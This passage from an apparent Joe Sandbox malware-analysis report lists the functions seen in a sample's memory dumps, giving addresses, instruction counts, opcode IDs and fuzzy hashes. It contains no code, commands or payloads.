                  • Instruction Fuzzy Hash: A2F0FC30A1A55E8FDB64EF65D4655FA77A0FF25308F11057AE82DC20E1CA75A660CF40
                  Function 00007FFD9BAB11C0 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 55608cc8436fc819b0a10414349869821e116019f6d13c6b76de32aa4d577744
                  • Instruction ID: 4b909795897e4bc5db432ea06dbaeb41d6741b1b11519fffe01b335dbcbe50ca
                  • Opcode Fuzzy Hash: 55608cc8436fc819b0a10414349869821e116019f6d13c6b76de32aa4d577744
                  • Instruction Fuzzy Hash: 08F0C831E2A56E4AEB649BE498796F976E0FF65304F00043ED42DC20E1EEB816548A40
                  Function 00007FFD9BABB3F5 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3620652c0cd8dd494df72fc63eca3aaeab31d1dde9ac2cc5def3e66dad258d61
                  • Instruction ID: f12fa1ec8527743300573ca3b7a138c850c5c98e11ef1ca2503f73501b61a65e
                  • Opcode Fuzzy Hash: 3620652c0cd8dd494df72fc63eca3aaeab31d1dde9ac2cc5def3e66dad258d61
                  • Instruction Fuzzy Hash: 4D015270E0922E8FDB28DB90C4606FDB7B0FF15300F51067AD019A62A2CBB89644CF84
                  Function 00007FFD9BABBB69 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 345956544c7846bca242a4d835ff2736e088efbc4241f2d4825ace8dde300553
                  • Instruction ID: 3887cbb4f7835e98778f21dda3e79ca6230159f0793fc7676ebab94071ed3c98
                  • Opcode Fuzzy Hash: 345956544c7846bca242a4d835ff2736e088efbc4241f2d4825ace8dde300553
                  • Instruction Fuzzy Hash: D301A23090E69E4FDBA59F6488292BD7BA0FF15200F4604BAD418C20A2DE7496048B00
                  Function 00007FFD9BACAF15 Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38aea66d7964ffd593bac32c1909136d0c31b5671f7101a9f1036cb72b907db3
                  • Instruction ID: fd9ebf94d33911ba4a6c1cf1b9e9cdd8617ec123bd6beaeab76cda60767aca2d
                  • Opcode Fuzzy Hash: 38aea66d7964ffd593bac32c1909136d0c31b5671f7101a9f1036cb72b907db3
                  • Instruction Fuzzy Hash: 20F0A46091E6CE4EEB626BB48C251F97FE4AF06210F0505BAE499C70A7DDB996188341
                  Function 00007FFD9BAB2749 Relevance: .0, Instructions: 34COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17aa570abdd84dbf9b398e33e14e97ca5ba5f6976663ebfb4a392eff48d3d2dd
                  • Instruction ID: 5177cb7cefb367cc54fd2e70e2ec01f83261ebe42577bfaed0bf921d0f361849
                  • Opcode Fuzzy Hash: 17aa570abdd84dbf9b398e33e14e97ca5ba5f6976663ebfb4a392eff48d3d2dd
                  • Instruction Fuzzy Hash: DFF0963191A38E8FDB699FA498641A93B60FF06304F4604BBD419C60E2DB786554CF01
                  Function 00007FFD9BAB27BD Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4e4f49ce91a42fe14e71b20c314ab7cc7bf30bd8c6c226bc2dfdf9b1fe26550
                  • Instruction ID: 3ba21b3edb5d845a16340be4eac719a1db043e37d97f149c8553724190b8df43
                  • Opcode Fuzzy Hash: c4e4f49ce91a42fe14e71b20c314ab7cc7bf30bd8c6c226bc2dfdf9b1fe26550
                  • Instruction Fuzzy Hash: 0CF0F030A1E78E8FEB689FA088252A93FA0FF05300F0204BBD419C21E2DB7995908B01
                  Function 00007FFD9BAC807C Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0961553593bf20646c9eec7e1ffb7b6f33cdbf69b15a2e7ad41452bf4d47c1e2
                  • Instruction ID: ab32d9667ce870045544a604c10ec677df16478e9f8a8954816e1a121fe4bbd7
                  • Opcode Fuzzy Hash: 0961553593bf20646c9eec7e1ffb7b6f33cdbf69b15a2e7ad41452bf4d47c1e2
                  • Instruction Fuzzy Hash: 83F0DA71E15A2D5EEBA4EB68C8657A9B3B2FB55300F5140F6944CD32A2EE742E818F01
                  Function 00007FFD9BAB434B Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a220203fba764e5338d7749da86c4d4bd3c4ee3c0dc42918f020387028139960
                  • Instruction ID: 6945bb1624ea37ec4bf56225bc5970aed9022714fc10bad40cba209799f84035
                  • Opcode Fuzzy Hash: a220203fba764e5338d7749da86c4d4bd3c4ee3c0dc42918f020387028139960
                  • Instruction Fuzzy Hash: 7D019A70E5A22DCFEB60DF58C8607ECB7B1BB58300F1144E9D45DA7291CB75AA808F10
                  Function 00007FFD9BACB140 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00d2c42b350bcc495a521cd230d1978c059997d490ba95139ee6492c7ec6d1a2
                  • Instruction ID: 0bc7ca3bb671cc9657e1603a3793a82352c506497db04b741b0d77953790f5d9
                  • Opcode Fuzzy Hash: 00d2c42b350bcc495a521cd230d1978c059997d490ba95139ee6492c7ec6d1a2
                  • Instruction Fuzzy Hash: 60E03030D2951E8AEB50BBA498186FEB2E4FF04304F415936D41CD20A1EA7592508641
                  Function 00007FFD9BABDB90 Relevance: .0, Instructions: 27COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ec97bd7661c7b95b1a68f155ac0c4c1a7e596c2b45310e72a5737cc08557fde
                  • Instruction ID: 9576008940b375069798ab9d45dc394f8e6501b2b58e99d87a0c2a82aed2c06c
                  • Opcode Fuzzy Hash: 1ec97bd7661c7b95b1a68f155ac0c4c1a7e596c2b45310e72a5737cc08557fde
                  • Instruction Fuzzy Hash: CAF0A431E0512D8FDB28DF94D9A09EDB3B1FB48311F11422ED44AA7794DBB86A40CF50
                  Function 00007FFD9BAB237F Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbf1f38400dd1cfde85e6f451250410887d0d2451b4f511dc0d55240b0db9851
                  • Instruction ID: f117364d46a3916d0f6dd775961b6193027478679e68e6db6717edf36d32e2ae
                  • Opcode Fuzzy Hash: dbf1f38400dd1cfde85e6f451250410887d0d2451b4f511dc0d55240b0db9851
                  • Instruction Fuzzy Hash: 99F01C30A0862D8EDB64EB50C861BE873B1EB50300F0101BAC02ED61A2CFB86A858F01
                  Function 00007FFD9BAC1C48 Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 32784924d9d046063be6e23b1c5a4922720596462ed80e13eb138fb4e093b2f3
                  • Instruction ID: f06785bb22a689c18e75aaf83942101c84e84590f668a978fe0b371d72fdd66e
                  • Opcode Fuzzy Hash: 32784924d9d046063be6e23b1c5a4922720596462ed80e13eb138fb4e093b2f3
                  • Instruction Fuzzy Hash: A5E0EC30B4950E8BEB24EBC0C564AFC73E1EB68310F210179D402E76E2DEB96F458B58
                  Function 00007FFD9BAB6966 Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 14526d6b0e6e53a17f8ea84dbb2540a09fa932f74772b2fc02d0ad29d1bd745a
                  • Instruction ID: 4ffd26ea719639cd092d9154c95917340923eb84e26e6e729a32c8504a93cdfe
                  • Opcode Fuzzy Hash: 14526d6b0e6e53a17f8ea84dbb2540a09fa932f74772b2fc02d0ad29d1bd745a
                  • Instruction Fuzzy Hash: DAE07574E5622ADFEBA0DF588860AE8B6B1BB48310F1004E9D41DA7291DA75AA808F10
                  Function 00007FFD9BABF405 Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABF000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9babf000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b57601eddd14e9fe86b2c0836bef995a2c4911f385a9463d7de742d36d0bd63b
                  • Instruction ID: 65e08c15317bf532ea6aee1212420b3e198e70ece68456e3e0f0669b1333444f
                  • Opcode Fuzzy Hash: b57601eddd14e9fe86b2c0836bef995a2c4911f385a9463d7de742d36d0bd63b
                  • Instruction Fuzzy Hash: DED092B090992E8EDBA0DF58C8147B9B7F1BB58305F0001F5A01CD22A1DB746A908F40

                  Non-executed Functions

                  Function 00007FFD9BABF764 Relevance: 10.1, Strings: 8, Instructions: 135COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABF000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9babf000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: ($5$9$@$R$[$e$g
                  • API String ID: 0-3620693125
                  • Opcode ID: 66c964a788afc7eb25be3e3b4f781848413d55b6a805c71ddbb94a87fd62c266
                  • Instruction ID: ec8eec47737bb728ea4c76893d73f0284b07a6cd16f9a99bb1ccdeb65821a245
                  • Opcode Fuzzy Hash: 66c964a788afc7eb25be3e3b4f781848413d55b6a805c71ddbb94a87fd62c266
                  • Instruction Fuzzy Hash: 0951C2B0E0962E8AEBA4DF64C8647E9B7B1AF49305F0041F9D41DA2291DF796A85CF40